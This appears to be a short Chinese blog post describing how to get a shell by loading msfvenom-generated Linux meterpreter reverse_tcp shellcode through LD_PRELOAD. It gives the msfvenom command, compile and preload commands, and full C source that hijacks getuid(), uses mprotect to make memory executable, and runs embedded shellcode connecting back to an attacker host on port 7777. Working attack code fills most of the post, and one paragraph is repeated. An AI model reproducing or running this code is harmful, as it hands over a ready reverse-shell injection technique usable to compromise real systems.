利用LD_PRELOAD加载metsploit生成的.so获得shell
先用msfvenom生成c 语言payload:msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=x.x.x.x lport=7777 -f c > test.c
补充完test.c后如下:
编译:gcc -fPIC -shared -o test.so test.c
LD_PRELOAD劫持:LD_PRELOAD=./test.so id
执行时报错:
Segmentation fault
成功拿到shell
补充完test.c后如下:
编译:gcc -fPIC -shared -o test.so test.c
LD_PRELOAD劫持:LD_PRELOAD=./test.so id
执行时报错:
Segmentation fault
推测应该是栈不可执行的原因,gcc编译的时候默认开启了NX选项,即数据所在内存页不可执行,可以在编译的加上 -z execstack 禁用NX保护,但是在这里行不通,因为是要劫持的程序(比如id)开启了NX,所以需要在程序里使栈可执行。在stackoverflow搜到一种方法,即利用mprotect函数使内存页可执行,该函数原型为int mprotect(void *addr, size_t len, int prot)。
修改后的程序如下:
重新编译, LD_PRELOAD#include #include #include #include #define PAGE_START(P) ((uintptr_t)(P) & ~(pagesize-1)) #define PAGE_END(P) (((uintptr_t)(P) + pagesize - 1) & ~(pagesize-1)) unsigned char shellcode[] = "\x48\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9" "\x6a\x22\x41\x5a\xb2\x07\x0f\x05\x48\x85\xc0\x78\x51\x6a\x0a" "\x41\x59\x50\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05" "\x48\x85\xc0\x78\x3b\x48\x97\x48\xb9\x02\x00\x1e\x61\xc0\xa8" "\xe8\x81\x51\x48\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x59" "\x48\x85\xc0\x79\x25\x49\xff\xc9\x74\x18\x57\x6a\x23\x58\x6a" "\x00\x6a\x05\x48\x89\xe7\x48\x31\xf6\x0f\x05\x59\x59\x5f\x48" "\x85\xc0\x79\xc7\x6a\x3c\x58\x6a\x01\x5f\x0f\x05\x5e\x6a\x7e" "\x5a\x0f\x05\x48\x85\xc0\x78\xed\xff\xe6"; uid_t getuid(void) { uintptr_t pagesize = sysconf(_SC_PAGE_SIZE); mprotect((void *)PAGE_START(shellcode), PAGE_END(shellcode + sizeof(shellcode)) - PAGE_START(shellcode), PROT_READ|PROT_WRITE|PROT_EXEC); int (*ret)() = (int(*)())shellcode; ret(); }
成功拿到shell
评论
发表评论